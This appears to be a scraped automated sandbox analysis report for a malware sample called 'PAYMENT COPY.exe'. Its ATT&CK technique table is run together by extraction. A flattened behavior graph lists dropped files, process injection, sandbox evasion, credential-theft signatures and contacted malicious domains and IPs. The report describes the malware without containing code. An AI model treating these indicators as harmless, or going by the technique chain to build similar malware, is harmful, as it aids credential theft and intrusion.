                      Security Software Discovery                      		SMB/Windows Admin Shares1
                      Email Collection                      		4
                      Non-Application Layer Protocol                      		Automated ExfiltrationData Encrypted for Impact
                      Employee NamesVirtual Private ServerLocal AccountsCron2
                      Registry Run Keys / Startup Folder                      		1
                      Scheduled Task/Job                      		3
                      Obfuscated Files or Information                      		NTDS3
                      Virtualization/Sandbox Evasion                      		Distributed Component Object ModelInput Capture4
                      Application Layer Protocol                      		Traffic DuplicationData Destruction
                      Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script2
                      Registry Run Keys / Startup Folder                      		1
                      Software Packing                      		LSA Secrets2
                      Process Discovery                      		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                      Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                      DLL Side-Loading                      		Cached Domain Credentials1
                      Application Window Discovery                      		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                      DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
                      Masquerading                      		DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                      Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job3
                      Virtualization/Sandbox Evasion                      		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                      Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt412
                      Process Injection                      		/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

                      Behavior Graph

                      Hide Legend

                      Legend:

                      • Process
                      • Signature
                      • Created File
                      • DNS/IP Info
                      • Is Dropped
                      • Is Windows Process
                      • Number of created Registry Values
                      • Number of created Files
                      • Visual Basic
                      • Delphi
                      • Java
                      • .Net C# or VB.NET
                      • C, C++ or other language
                      • Is malicious
                      • Internet
                      behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1635000 Sample: PAYMENT COPY.exe Startdate: 11/03/2025 Architecture: WINDOWS Score: 100 42 www.splogi.xyz 2->42 44 www.moonavatar.xyz 2->44 46 18 other IPs or domains 2->46 64 Suricata IDS alerts for network traffic 2->64 66 Antivirus detection for URL or domain 2->66 68 Antivirus / Scanner detection for submitted sample 2->68 72 11 other signatures 2->72 10 PAYMENT COPY.exe 15 5 2->10         started        15 wscript.exe 1 2->15         started        signatures3 70 Performs DNS queries to domains with low reputation 44->70 process4 dnsIp5 48 196.251.83.222, 49683, 49689, 80 SONIC-WirelessZA Seychelles 10->48 36 C:\Users\user\AppData\Roaming\HashSize.exe, PE32 10->36 dropped 38 C:\Users\user\AppData\...\HashSize.vbs, ASCII 10->38 dropped 40 C:\Users\...\HashSize.exe:Zone.Identifier, ASCII 10->40 dropped 84 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 10->84 17 PAYMENT COPY.exe 10->17         started        86 Windows Scripting host queries suspicious COM object (likely to drop second stage) 15->86 20 HashSize.exe 14 2 15->20         started        file6 signatures7 process8 signatures9 56 Maps a DLL or memory area into another process 17->56 22 BMYdhGJqo1.exe 17->22 injected 58 Antivirus detection for dropped file 20->58 60 Multi AV Scanner detection for dropped file 20->60 62 Injects a PE file into a foreign processes 20->62 25 HashSize.exe 20->25         started        process10 signatures11 74 Found direct / indirect Syscall (likely to bypass EDR) 22->74 27 finger.exe 13 22->27         started        process12 signatures13 76 Tries to steal Mail credentials (via file / registry access) 27->76 78 Tries to harvest and steal browser information (history, passwords, etc) 27->78 80 Modifies the context of a thread in another process (thread injection) 27->80 82 3 other signatures 27->82 30 BMYdhGJqo1.exe 27->30 injected 34 firefox.exe 27->34         started        process14 dnsIp15 50 an05-prod-v.cdn-ng.net 103.42.144.24, 58078, 58079, 58080 WSN-TW-NET-ASWorldstarNetworkTW Taiwan; Republic of China (ROC) 30->50 52 www.xiongding.tech 111.119.219.195, 58110, 58111, 58112 SIPL-ASSysconInfowayPvtLtdIN India 30->52 54 8 other IPs or domains 30->54 88 Found direct / indirect Syscall (likely to bypass EDR) 30->88 signatures16

                      Screenshots

                      Thumbnails

                      This section contains all screenshots as thumbnails, including those not shown in the slideshow.